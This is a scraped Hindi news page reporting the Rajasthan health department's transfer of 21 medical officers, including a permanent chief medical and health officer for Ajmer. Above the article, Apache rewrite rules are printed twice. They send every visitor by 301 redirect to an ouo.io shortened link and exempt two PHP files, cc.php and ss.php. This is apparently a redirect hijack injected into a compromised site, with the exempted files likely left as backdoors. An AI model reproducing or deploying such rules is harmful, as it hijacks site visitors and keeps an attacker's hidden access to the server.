
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 471
Previous Nextअजमेर। राज्य में सरकार के तबादलों से रोक हटाने के बाद चिकित्सा विभाग ने चिकित्सा अधिकारियों की तबादला सूची जारी कर दी। शुक्रवार को जारी हुई तबादला सूची में अजमेर को स्थाई रूप से CMHO (मुख्य चिकित्सा एवं स्वास्थ्य अधिकारी) मिल गया। अजमेर को CMHO दो साल बाद मिला है। इसके साथ ही तीन अन्य चिकित्सा अधिकारी भी अजमेर में विभिन्न पदों पर पदस्थापन हुए हैं। चिकित्सा एवं स्वास्थ्य (ग्रुप-2) विभाग शासन उप सचिव पारस चंद जैन ने कल 21 चिकित्सा अधिकारियों की तबादला सूची जारी की है। जिसमें कार्यकारी मुख्य चिकित्सा एवं स्वास्थ्य अधिकारी डॉ. केके सोनी को स्थाई रूप से इसी पद पर अजमेर ही लगाया गया है। अतिरिक्त मुख्य चिकित्सा एवं स्वास्थ्य अधिकारी अजमेर के पद पर राजकीय डिस्पेंसरी राजस्थान हाउस नई दिल्ली में तैनात डॉ. संपत सिंह जोधा एवं सामान्य चिकित्सालय नसीराबाद के डॉ. रामस्वरूप किराडिया को उप मुख्य चिकित्सा एवं स्वास्थ्य अधिकारी पद पर लगाया है। उप मुख्य चिकित्सा एवं स्वास्थ्य अधिकारी पद पर कार्यरत डॉ. लाल थदानी को प्राथमिक स्वास्थ्य केंद्र मंडोलाई टोंक लगाया गया है। डाॅ. किराडिया ने अजमेर में उप मुख्य चिकित्सा एवं स्वास्थ्य अधिकारी पद पर कार्यग्रहण कर लिया है।